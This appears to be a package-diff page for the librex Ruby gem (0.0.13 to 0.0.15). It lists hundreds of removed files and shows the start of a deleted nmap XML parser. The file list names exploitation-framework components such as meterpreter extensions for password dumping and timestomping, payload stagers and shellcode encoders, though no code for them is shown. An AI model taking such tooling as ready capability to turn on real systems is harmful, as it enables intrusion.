librex 0.0.13 → 0.0.15

Sign up to get free protection for your applications and to get access to all the features.
Files changed (435) hide show
  1. data/README.markdown +1 -1
  2. data/Rakefile +1 -0
  3. metadata +3 -435
  4. data/lib/rex/LICENSE +0 -29
  5. data/lib/rex/arch.rb +0 -103
  6. data/lib/rex/arch/sparc.rb +0 -75
  7. data/lib/rex/arch/sparc.rb.ut.rb +0 -18
  8. data/lib/rex/arch/x86.rb +0 -513
  9. data/lib/rex/arch/x86.rb.ut.rb +0 -93
  10. data/lib/rex/assembly/nasm.rb +0 -104
  11. data/lib/rex/assembly/nasm.rb.ut.rb +0 -22
  12. data/lib/rex/codepage.map +0 -104
  13. data/lib/rex/compat.rb +0 -311
  14. data/lib/rex/constants.rb +0 -113
  15. data/lib/rex/elfparsey.rb +0 -11
  16. data/lib/rex/elfparsey/elf.rb +0 -123
  17. data/lib/rex/elfparsey/elfbase.rb +0 -258
  18. data/lib/rex/elfparsey/exceptions.rb +0 -27
  19. data/lib/rex/elfscan.rb +0 -12
  20. data/lib/rex/elfscan/scanner.rb +0 -207
  21. data/lib/rex/elfscan/search.rb +0 -46
  22. data/lib/rex/encoder/alpha2.rb +0 -31
  23. data/lib/rex/encoder/alpha2/alpha_mixed.rb +0 -68
  24. data/lib/rex/encoder/alpha2/alpha_upper.rb +0 -79
  25. data/lib/rex/encoder/alpha2/generic.rb +0 -114
  26. data/lib/rex/encoder/alpha2/unicode_mixed.rb +0 -117
  27. data/lib/rex/encoder/alpha2/unicode_upper.rb +0 -129
  28. data/lib/rex/encoder/ndr.rb +0 -89
  29. data/lib/rex/encoder/ndr.rb.ut.rb +0 -44
  30. data/lib/rex/encoder/nonalpha.rb +0 -61
  31. data/lib/rex/encoder/nonupper.rb +0 -64
  32. data/lib/rex/encoder/xdr.rb +0 -106
  33. data/lib/rex/encoder/xdr.rb.ut.rb +0 -29
  34. data/lib/rex/encoder/xor.rb +0 -69
  35. data/lib/rex/encoder/xor/dword.rb +0 -13
  36. data/lib/rex/encoder/xor/dword_additive.rb +0 -13
  37. data/lib/rex/encoders/xor_dword.rb +0 -35
  38. data/lib/rex/encoders/xor_dword_additive.rb +0 -53
  39. data/lib/rex/encoders/xor_dword_additive.rb.ut.rb +0 -12
  40. data/lib/rex/encoding/xor.rb +0 -20
  41. data/lib/rex/encoding/xor.rb.ts.rb +0 -14
  42. data/lib/rex/encoding/xor/byte.rb +0 -15
  43. data/lib/rex/encoding/xor/byte.rb.ut.rb +0 -21
  44. data/lib/rex/encoding/xor/dword.rb +0 -21
  45. data/lib/rex/encoding/xor/dword.rb.ut.rb +0 -15
  46. data/lib/rex/encoding/xor/dword_additive.rb +0 -92
  47. data/lib/rex/encoding/xor/dword_additive.rb.ut.rb +0 -15
  48. data/lib/rex/encoding/xor/exceptions.rb +0 -17
  49. data/lib/rex/encoding/xor/generic.rb +0 -146
  50. data/lib/rex/encoding/xor/generic.rb.ut.rb +0 -120
  51. data/lib/rex/encoding/xor/qword.rb +0 -15
  52. data/lib/rex/encoding/xor/word.rb +0 -21
  53. data/lib/rex/encoding/xor/word.rb.ut.rb +0 -13
  54. data/lib/rex/exceptions.rb +0 -275
  55. data/lib/rex/exceptions.rb.ut.rb +0 -44
  56. data/lib/rex/exploitation/cmdstager.rb +0 -9
  57. data/lib/rex/exploitation/cmdstager/base.rb +0 -175
  58. data/lib/rex/exploitation/cmdstager/debug_asm.rb +0 -142
  59. data/lib/rex/exploitation/cmdstager/debug_write.rb +0 -136
  60. data/lib/rex/exploitation/cmdstager/tftp.rb +0 -63
  61. data/lib/rex/exploitation/cmdstager/vbs.rb +0 -128
  62. data/lib/rex/exploitation/egghunter.rb +0 -277
  63. data/lib/rex/exploitation/egghunter.rb.ut.rb +0 -25
  64. data/lib/rex/exploitation/encryptjs.rb +0 -77
  65. data/lib/rex/exploitation/heaplib.js.b64 +0 -331
  66. data/lib/rex/exploitation/heaplib.rb +0 -94
  67. data/lib/rex/exploitation/javascriptosdetect.rb +0 -897
  68. data/lib/rex/exploitation/obfuscatejs.rb +0 -335
  69. data/lib/rex/exploitation/omelet.rb +0 -320
  70. data/lib/rex/exploitation/omelet.rb.ut.rb +0 -13
  71. data/lib/rex/exploitation/opcodedb.rb +0 -818
  72. data/lib/rex/exploitation/opcodedb.rb.ut.rb +0 -279
  73. data/lib/rex/exploitation/seh.rb +0 -92
  74. data/lib/rex/exploitation/seh.rb.ut.rb +0 -19
  75. data/lib/rex/file.rb +0 -112
  76. data/lib/rex/file.rb.ut.rb +0 -16
  77. data/lib/rex/image_source.rb +0 -12
  78. data/lib/rex/image_source/disk.rb +0 -60
  79. data/lib/rex/image_source/image_source.rb +0 -46
  80. data/lib/rex/image_source/memory.rb +0 -37
  81. data/lib/rex/io/bidirectional_pipe.rb +0 -157
  82. data/lib/rex/io/datagram_abstraction.rb +0 -35
  83. data/lib/rex/io/stream.rb +0 -319
  84. data/lib/rex/io/stream_abstraction.rb +0 -197
  85. data/lib/rex/io/stream_server.rb +0 -211
  86. data/lib/rex/job_container.rb +0 -187
  87. data/lib/rex/logging.rb +0 -4
  88. data/lib/rex/logging/log_dispatcher.rb +0 -179
  89. data/lib/rex/logging/log_sink.rb +0 -42
  90. data/lib/rex/logging/sinks/flatfile.rb +0 -55
  91. data/lib/rex/logging/sinks/stderr.rb +0 -43
  92. data/lib/rex/machparsey.rb +0 -9
  93. data/lib/rex/machparsey/exceptions.rb +0 -34
  94. data/lib/rex/machparsey/mach.rb +0 -209
  95. data/lib/rex/machparsey/machbase.rb +0 -408
  96. data/lib/rex/machscan.rb +0 -9
  97. data/lib/rex/machscan/scanner.rb +0 -217
  98. data/lib/rex/mime.rb +0 -9
  99. data/lib/rex/mime/header.rb +0 -77
  100. data/lib/rex/mime/message.rb +0 -144
  101. data/lib/rex/mime/part.rb +0 -20
  102. data/lib/rex/nop/opty2.rb +0 -108
  103. data/lib/rex/nop/opty2.rb.ut.rb +0 -23
  104. data/lib/rex/nop/opty2_tables.rb +0 -300
  105. data/lib/rex/ole.rb +0 -205
  106. data/lib/rex/ole/clsid.rb +0 -47
  107. data/lib/rex/ole/difat.rb +0 -141
  108. data/lib/rex/ole/directory.rb +0 -231
  109. data/lib/rex/ole/direntry.rb +0 -240
  110. data/lib/rex/ole/docs/dependencies.txt +0 -8
  111. data/lib/rex/ole/docs/references.txt +0 -1
  112. data/lib/rex/ole/fat.rb +0 -99
  113. data/lib/rex/ole/header.rb +0 -204
  114. data/lib/rex/ole/minifat.rb +0 -77
  115. data/lib/rex/ole/propset.rb +0 -144
  116. data/lib/rex/ole/samples/create_ole.rb +0 -27
  117. data/lib/rex/ole/samples/dir.rb +0 -35
  118. data/lib/rex/ole/samples/dump_stream.rb +0 -34
  119. data/lib/rex/ole/samples/ole_info.rb +0 -23
  120. data/lib/rex/ole/storage.rb +0 -395
  121. data/lib/rex/ole/stream.rb +0 -53
  122. data/lib/rex/ole/substorage.rb +0 -49
  123. data/lib/rex/ole/util.rb +0 -157
  124. data/lib/rex/parser/arguments.rb +0 -97
  125. data/lib/rex/parser/arguments.rb.ut.rb +0 -67
  126. data/lib/rex/parser/ini.rb +0 -185
  127. data/lib/rex/parser/ini.rb.ut.rb +0 -29
  128. data/lib/rex/parser/ip360_aspl_xml.rb +0 -102
  129. data/lib/rex/parser/ip360_xml.rb +0 -93
  130. data/lib/rex/parser/nessus_xml.rb +0 -118
  131. data/lib/rex/parser/netsparker_xml.rb +0 -94
  132. data/lib/rex/parser/nexpose_xml.rb +0 -131
  133. data/lib/rex/parser/nmap_xml.rb +0 -121
  134. data/lib/rex/parser/retina_xml.rb +0 -109
  135. data/lib/rex/payloads.rb +0 -1
  136. data/lib/rex/payloads/win32.rb +0 -2
  137. data/lib/rex/payloads/win32/common.rb +0 -26
  138. data/lib/rex/payloads/win32/kernel.rb +0 -53
  139. data/lib/rex/payloads/win32/kernel/common.rb +0 -54
  140. data/lib/rex/payloads/win32/kernel/migration.rb +0 -12
  141. data/lib/rex/payloads/win32/kernel/recovery.rb +0 -50
  142. data/lib/rex/payloads/win32/kernel/stager.rb +0 -194
  143. data/lib/rex/peparsey.rb +0 -12
  144. data/lib/rex/peparsey/exceptions.rb +0 -32
  145. data/lib/rex/peparsey/pe.rb +0 -212
  146. data/lib/rex/peparsey/pe_memdump.rb +0 -63
  147. data/lib/rex/peparsey/pebase.rb +0 -1680
  148. data/lib/rex/peparsey/section.rb +0 -136
  149. data/lib/rex/pescan.rb +0 -13
  150. data/lib/rex/pescan/analyze.rb +0 -309
  151. data/lib/rex/pescan/scanner.rb +0 -206
  152. data/lib/rex/pescan/search.rb +0 -56
  153. data/lib/rex/platforms.rb +0 -1
  154. data/lib/rex/platforms/windows.rb +0 -51
  155. data/lib/rex/poly.rb +0 -132
  156. data/lib/rex/poly/block.rb +0 -477
  157. data/lib/rex/poly/register.rb +0 -100
  158. data/lib/rex/poly/register/x86.rb +0 -40
  159. data/lib/rex/post.rb +0 -8
  160. data/lib/rex/post/dir.rb +0 -51
  161. data/lib/rex/post/file.rb +0 -172
  162. data/lib/rex/post/file_stat.rb +0 -220
  163. data/lib/rex/post/gen.pl +0 -13
  164. data/lib/rex/post/io.rb +0 -182
  165. data/lib/rex/post/meterpreter.rb +0 -4
  166. data/lib/rex/post/meterpreter/channel.rb +0 -445
  167. data/lib/rex/post/meterpreter/channel_container.rb +0 -54
  168. data/lib/rex/post/meterpreter/channels/pool.rb +0 -160
  169. data/lib/rex/post/meterpreter/channels/pools/file.rb +0 -62
  170. data/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +0 -103
  171. data/lib/rex/post/meterpreter/channels/stream.rb +0 -87
  172. data/lib/rex/post/meterpreter/client.rb +0 -364
  173. data/lib/rex/post/meterpreter/client_core.rb +0 -274
  174. data/lib/rex/post/meterpreter/dependencies.rb +0 -3
  175. data/lib/rex/post/meterpreter/extension.rb +0 -32
  176. data/lib/rex/post/meterpreter/extensions/espia/espia.rb +0 -58
  177. data/lib/rex/post/meterpreter/extensions/espia/tlv.rb +0 -16
  178. data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +0 -94
  179. data/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +0 -21
  180. data/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb +0 -57
  181. data/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb +0 -15
  182. data/lib/rex/post/meterpreter/extensions/priv/fs.rb +0 -118
  183. data/lib/rex/post/meterpreter/extensions/priv/passwd.rb +0 -61
  184. data/lib/rex/post/meterpreter/extensions/priv/priv.rb +0 -111
  185. data/lib/rex/post/meterpreter/extensions/priv/tlv.rb +0 -28
  186. data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +0 -101
  187. data/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb +0 -26
  188. data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +0 -333
  189. data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +0 -282
  190. data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +0 -266
  191. data/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +0 -103
  192. data/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +0 -48
  193. data/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +0 -144
  194. data/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +0 -73
  195. data/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +0 -56
  196. data/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +0 -137
  197. data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +0 -180
  198. data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +0 -167
  199. data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +0 -208
  200. data/lib/rex/post/meterpreter/extensions/stdapi/railgun.rb.ts.rb +0 -6
  201. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb +0 -38106
  202. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb.ut.rb +0 -31
  203. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb +0 -47
  204. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb.ut.rb +0 -36
  205. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb +0 -1818
  206. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_iphlpapi.rb +0 -96
  207. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb +0 -3848
  208. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb +0 -26
  209. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ntdll.rb +0 -153
  210. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb +0 -21
  211. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_user32.rb +0 -3169
  212. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb +0 -599
  213. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb +0 -318
  214. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb +0 -100
  215. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb.ut.rb +0 -42
  216. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb +0 -148
  217. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb.ut.rb +0 -127
  218. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb +0 -309
  219. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb +0 -204
  220. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/tlv.rb +0 -51
  221. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/util.rb +0 -630
  222. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb +0 -75
  223. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb.ut.rb +0 -103
  224. data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +0 -149
  225. data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +0 -97
  226. data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +0 -192
  227. data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +0 -41
  228. data/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +0 -61
  229. data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +0 -370
  230. data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +0 -129
  231. data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +0 -55
  232. data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +0 -336
  233. data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +0 -141
  234. data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +0 -279
  235. data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +0 -193
  236. data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +0 -102
  237. data/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +0 -180
  238. data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +0 -211
  239. data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +0 -227
  240. data/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +0 -63
  241. data/lib/rex/post/meterpreter/inbound_packet_handler.rb +0 -30
  242. data/lib/rex/post/meterpreter/object_aliases.rb +0 -83
  243. data/lib/rex/post/meterpreter/packet.rb +0 -688
  244. data/lib/rex/post/meterpreter/packet_dispatcher.rb +0 -431
  245. data/lib/rex/post/meterpreter/packet_parser.rb +0 -94
  246. data/lib/rex/post/meterpreter/packet_response_waiter.rb +0 -83
  247. data/lib/rex/post/meterpreter/ui/console.rb +0 -137
  248. data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +0 -62
  249. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +0 -730
  250. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +0 -108
  251. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +0 -241
  252. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb +0 -231
  253. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +0 -61
  254. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +0 -98
  255. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +0 -51
  256. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +0 -132
  257. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +0 -187
  258. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +0 -65
  259. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +0 -442
  260. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +0 -298
  261. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +0 -486
  262. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +0 -315
  263. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb +0 -157
  264. data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +0 -95
  265. data/lib/rex/post/permission.rb +0 -26
  266. data/lib/rex/post/process.rb +0 -57
  267. data/lib/rex/post/thread.rb +0 -57
  268. data/lib/rex/post/ui.rb +0 -52
  269. data/lib/rex/proto.rb +0 -13
  270. data/lib/rex/proto.rb.ts.rb +0 -8
  271. data/lib/rex/proto/dcerpc.rb +0 -6
  272. data/lib/rex/proto/dcerpc.rb.ts.rb +0 -9
  273. data/lib/rex/proto/dcerpc/client.rb +0 -361
  274. data/lib/rex/proto/dcerpc/client.rb.ut.rb +0 -491
  275. data/lib/rex/proto/dcerpc/exceptions.rb +0 -150
  276. data/lib/rex/proto/dcerpc/handle.rb +0 -47
  277. data/lib/rex/proto/dcerpc/handle.rb.ut.rb +0 -85
  278. data/lib/rex/proto/dcerpc/ndr.rb +0 -72
  279. data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +0 -41
  280. data/lib/rex/proto/dcerpc/packet.rb +0 -253
  281. data/lib/rex/proto/dcerpc/packet.rb.ut.rb +0 -56
  282. data/lib/rex/proto/dcerpc/response.rb +0 -187
  283. data/lib/rex/proto/dcerpc/response.rb.ut.rb +0 -15
  284. data/lib/rex/proto/dcerpc/uuid.rb +0 -84
  285. data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +0 -46
  286. data/lib/rex/proto/dhcp.rb +0 -7
  287. data/lib/rex/proto/dhcp/constants.rb +0 -33
  288. data/lib/rex/proto/dhcp/server.rb +0 -292
  289. data/lib/rex/proto/drda.rb +0 -5
  290. data/lib/rex/proto/drda.rb.ts.rb +0 -17
  291. data/lib/rex/proto/drda/constants.rb +0 -49
  292. data/lib/rex/proto/drda/constants.rb.ut.rb +0 -23
  293. data/lib/rex/proto/drda/packet.rb +0 -252
  294. data/lib/rex/proto/drda/packet.rb.ut.rb +0 -109
  295. data/lib/rex/proto/drda/utils.rb +0 -123
  296. data/lib/rex/proto/drda/utils.rb.ut.rb +0 -84
  297. data/lib/rex/proto/http.rb +0 -5
  298. data/lib/rex/proto/http.rb.ts.rb +0 -12
  299. data/lib/rex/proto/http/client.rb +0 -821
  300. data/lib/rex/proto/http/client.rb.ut.rb +0 -95
  301. data/lib/rex/proto/http/handler.rb +0 -46
  302. data/lib/rex/proto/http/handler/erb.rb +0 -128
  303. data/lib/rex/proto/http/handler/erb.rb.ut.rb +0 -21
  304. data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +0 -1
  305. data/lib/rex/proto/http/handler/proc.rb +0 -60
  306. data/lib/rex/proto/http/handler/proc.rb.ut.rb +0 -24
  307. data/lib/rex/proto/http/header.rb +0 -161
  308. data/lib/rex/proto/http/header.rb.ut.rb +0 -46
  309. data/lib/rex/proto/http/packet.rb +0 -407
  310. data/lib/rex/proto/http/packet.rb.ut.rb +0 -165
  311. data/lib/rex/proto/http/request.rb +0 -356
  312. data/lib/rex/proto/http/request.rb.ut.rb +0 -214
  313. data/lib/rex/proto/http/response.rb +0 -90
  314. data/lib/rex/proto/http/response.rb.ut.rb +0 -149
  315. data/lib/rex/proto/http/server.rb +0 -369
  316. data/lib/rex/proto/http/server.rb.ut.rb +0 -79
  317. data/lib/rex/proto/ntlm.rb +0 -7
  318. data/lib/rex/proto/ntlm.rb.ut.rb +0 -177
  319. data/lib/rex/proto/ntlm/base.rb +0 -326
  320. data/lib/rex/proto/ntlm/constants.rb +0 -74
  321. data/lib/rex/proto/ntlm/crypt.rb +0 -415
  322. data/lib/rex/proto/ntlm/exceptions.rb +0 -9
  323. data/lib/rex/proto/ntlm/message.rb +0 -533
  324. data/lib/rex/proto/ntlm/utils.rb +0 -763
  325. data/lib/rex/proto/proxy/socks4a.rb +0 -440
  326. data/lib/rex/proto/rfb.rb +0 -19
  327. data/lib/rex/proto/rfb.rb.ut.rb +0 -37
  328. data/lib/rex/proto/rfb/cipher.rb +0 -84
  329. data/lib/rex/proto/rfb/client.rb +0 -207
  330. data/lib/rex/proto/rfb/constants.rb +0 -52
  331. data/lib/rex/proto/smb.rb +0 -7
  332. data/lib/rex/proto/smb.rb.ts.rb +0 -8
  333. data/lib/rex/proto/smb/client.rb +0 -1952
  334. data/lib/rex/proto/smb/client.rb.ut.rb +0 -223
  335. data/lib/rex/proto/smb/constants.rb +0 -1047
  336. data/lib/rex/proto/smb/constants.rb.ut.rb +0 -18
  337. data/lib/rex/proto/smb/crypt.rb +0 -36
  338. data/lib/rex/proto/smb/evasions.rb +0 -66
  339. data/lib/rex/proto/smb/exceptions.rb +0 -858
  340. data/lib/rex/proto/smb/simpleclient.rb +0 -306
  341. data/lib/rex/proto/smb/simpleclient.rb.ut.rb +0 -128
  342. data/lib/rex/proto/smb/utils.rb +0 -103
  343. data/lib/rex/proto/smb/utils.rb.ut.rb +0 -20
  344. data/lib/rex/proto/sunrpc.rb +0 -1
  345. data/lib/rex/proto/sunrpc/client.rb +0 -195
  346. data/lib/rex/proto/tftp.rb +0 -12
  347. data/lib/rex/proto/tftp/constants.rb +0 -39
  348. data/lib/rex/proto/tftp/server.rb +0 -497
  349. data/lib/rex/proto/tftp/server.rb.ut.rb +0 -28
  350. data/lib/rex/script.rb +0 -42
  351. data/lib/rex/script/base.rb +0 -59
  352. data/lib/rex/script/meterpreter.rb +0 -15
  353. data/lib/rex/script/shell.rb +0 -9
  354. data/lib/rex/service.rb +0 -48
  355. data/lib/rex/service_manager.rb +0 -141
  356. data/lib/rex/service_manager.rb.ut.rb +0 -32
  357. data/lib/rex/services/local_relay.rb +0 -423
  358. data/lib/rex/socket.rb +0 -684
  359. data/lib/rex/socket.rb.ut.rb +0 -107
  360. data/lib/rex/socket/comm.rb +0 -119
  361. data/lib/rex/socket/comm/local.rb +0 -412
  362. data/lib/rex/socket/comm/local.rb.ut.rb +0 -75
  363. data/lib/rex/socket/ip.rb +0 -130
  364. data/lib/rex/socket/parameters.rb +0 -345
  365. data/lib/rex/socket/parameters.rb.ut.rb +0 -51
  366. data/lib/rex/socket/range_walker.rb +0 -346
  367. data/lib/rex/socket/range_walker.rb.ut.rb +0 -55
  368. data/lib/rex/socket/ssl_tcp.rb +0 -184
  369. data/lib/rex/socket/ssl_tcp.rb.ut.rb +0 -39
  370. data/lib/rex/socket/ssl_tcp_server.rb +0 -122
  371. data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +0 -61
  372. data/lib/rex/socket/subnet_walker.rb +0 -75
  373. data/lib/rex/socket/subnet_walker.rb.ut.rb +0 -28
  374. data/lib/rex/socket/switch_board.rb +0 -278
  375. data/lib/rex/socket/switch_board.rb.ut.rb +0 -52
  376. data/lib/rex/socket/tcp.rb +0 -76
  377. data/lib/rex/socket/tcp.rb.ut.rb +0 -64
  378. data/lib/rex/socket/tcp_server.rb +0 -67
  379. data/lib/rex/socket/tcp_server.rb.ut.rb +0 -44
  380. data/lib/rex/socket/udp.rb +0 -164
  381. data/lib/rex/socket/udp.rb.ut.rb +0 -44
  382. data/lib/rex/struct2.rb +0 -5
  383. data/lib/rex/struct2/c_struct.rb +0 -181
  384. data/lib/rex/struct2/c_struct_template.rb +0 -39
  385. data/lib/rex/struct2/constant.rb +0 -26
  386. data/lib/rex/struct2/element.rb +0 -44
  387. data/lib/rex/struct2/generic.rb +0 -73
  388. data/lib/rex/struct2/restraint.rb +0 -54
  389. data/lib/rex/struct2/s_string.rb +0 -72
  390. data/lib/rex/struct2/s_struct.rb +0 -111
  391. data/lib/rex/sync.rb +0 -6
  392. data/lib/rex/sync/event.rb +0 -94
  393. data/lib/rex/sync/read_write_lock.rb +0 -176
  394. data/lib/rex/sync/ref.rb +0 -57
  395. data/lib/rex/sync/thread_safe.rb +0 -82
  396. data/lib/rex/test.rb +0 -35
  397. data/lib/rex/text.rb +0 -1149
  398. data/lib/rex/text.rb.ut.rb +0 -190
  399. data/lib/rex/thread_factory.rb +0 -42
  400. data/lib/rex/time.rb +0 -65
  401. data/lib/rex/transformer.rb +0 -115
  402. data/lib/rex/transformer.rb.ut.rb +0 -38
  403. data/lib/rex/ui.rb +0 -21
  404. data/lib/rex/ui/interactive.rb +0 -254
  405. data/lib/rex/ui/output.rb +0 -78
  406. data/lib/rex/ui/output/none.rb +0 -18
  407. data/lib/rex/ui/progress_tracker.rb +0 -96
  408. data/lib/rex/ui/subscriber.rb +0 -149
  409. data/lib/rex/ui/text/color.rb +0 -97
  410. data/lib/rex/ui/text/color.rb.ut.rb +0 -18
  411. data/lib/rex/ui/text/dispatcher_shell.rb +0 -467
  412. data/lib/rex/ui/text/input.rb +0 -117
  413. data/lib/rex/ui/text/input/buffer.rb +0 -75
  414. data/lib/rex/ui/text/input/readline.rb +0 -129
  415. data/lib/rex/ui/text/input/socket.rb +0 -95
  416. data/lib/rex/ui/text/input/stdio.rb +0 -45
  417. data/lib/rex/ui/text/irb_shell.rb +0 -57
  418. data/lib/rex/ui/text/output.rb +0 -80
  419. data/lib/rex/ui/text/output/buffer.rb +0 -61
  420. data/lib/rex/ui/text/output/file.rb +0 -43
  421. data/lib/rex/ui/text/output/socket.rb +0 -43
  422. data/lib/rex/ui/text/output/stdio.rb +0 -40
  423. data/lib/rex/ui/text/progress_tracker.rb +0 -56
  424. data/lib/rex/ui/text/progress_tracker.rb.ut.rb +0 -34
  425. data/lib/rex/ui/text/shell.rb +0 -328
  426. data/lib/rex/ui/text/table.rb +0 -279
  427. data/lib/rex/ui/text/table.rb.ut.rb +0 -55
  428. data/lib/rex/zip.rb +0 -93
  429. data/lib/rex/zip/archive.rb +0 -184
  430. data/lib/rex/zip/blocks.rb +0 -182
  431. data/lib/rex/zip/entry.rb +0 -104
  432. data/lib/rex/zip/samples/comment.rb +0 -32
  433. data/lib/rex/zip/samples/mkwar.rb +0 -138
  434. data/lib/rex/zip/samples/mkzip.rb +0 -19
  435. data/lib/rex/zip/samples/recursive.rb +0 -58
@@ -1,121 +0,0 @@
1
-
2
- require 'rexml/document'
3
-
4
- module Rex
5
- module Parser
6
-
7
- #
8
- # Stream parser for nmap -oX xml output
9
- #
10
- # Yields a hash representing each host found in the xml stream. Each host
11
- # will look something like the following:
12
- # {
13
- # "status" => "up",
14
- # "addrs" => { "ipv4" => "192.168.0.1", "mac" => "00:0d:87:a1:df:72" },
15
- # "ports" => [
16
- # { "portid" => "22", "state" => "closed", ... },
17
- # { "portid" => "80", "state" => "open", ... },
18
- # ...
19
- # ]
20
- # }
21
- #
22
- # Usage:
23
- # <tt>
24
- # parser = NmapXMLStreamParser.new { |host|
25
- # # do stuff with the host
26
- # }
27
- # REXML::Document.parse_stream(File.new(nmap_xml), parser)
28
- # </tt>
29
- # -- or --
30
- # <tt>
31
- # parser = NmapXMLStreamParser.new
32
- # parser.on_found_host = Proc.new { |host|
33
- # # do stuff with the host
34
- # }
35
- # REXML::Document.parse_stream(File.new(nmap_xml), parser)
36
- # </tt>
37
- #
38
- # This parser does not maintain state as well as a tree parser, so malformed
39
- # xml will trip it up. Nmap shouldn't ever output malformed xml, so it's not
40
- # a big deal.
41
- #
42
- class NmapXMLStreamParser
43
-
44
- attr_accessor :on_found_host
45
-
46
- def initialize(&block)
47
- reset_state
48
- on_found_host = block if block
49
- end
50
-
51
- def reset_state
52
- @host = { "status" => nil, "addrs" => {}, "ports" => [] }
53
- end
54
-
55
- def tag_start(name, attributes)
56
- case name
57
- when "address"
58
- @host["addrs"][attributes["addrtype"]] = attributes["addr"]
59
- if (attributes["addrtype"] =~ /ipv[46]/)
60
- @host["addr"] = attributes["addr"]
61
- end
62
- when "osclass"
63
- @host["os_vendor"] = attributes["vendor"]
64
- @host["os_family"] = attributes["osfamily"]
65
- @host["os_version"] = attributes["osgen"]
66
- @host["os_accuracy"] = attributes["accuracy"]
67
- when "osmatch"
68
- if(attributes["accuracy"].to_i == 100)
69
- @host["os_match"] = attributes["name"]
70
- end
71
- when "uptime"
72
- @host["last_boot"] = attributes["lastboot"]
73
- when "hostname"
74
- if(attributes["type"] == "PTR")
75
- @host["reverse_dns"] = attributes["name"]
76
- end
77
- when "status"
78
- # <status> refers to the liveness of the host; values are "up" or "down"
79
- @host["status"] = attributes["state"]
80
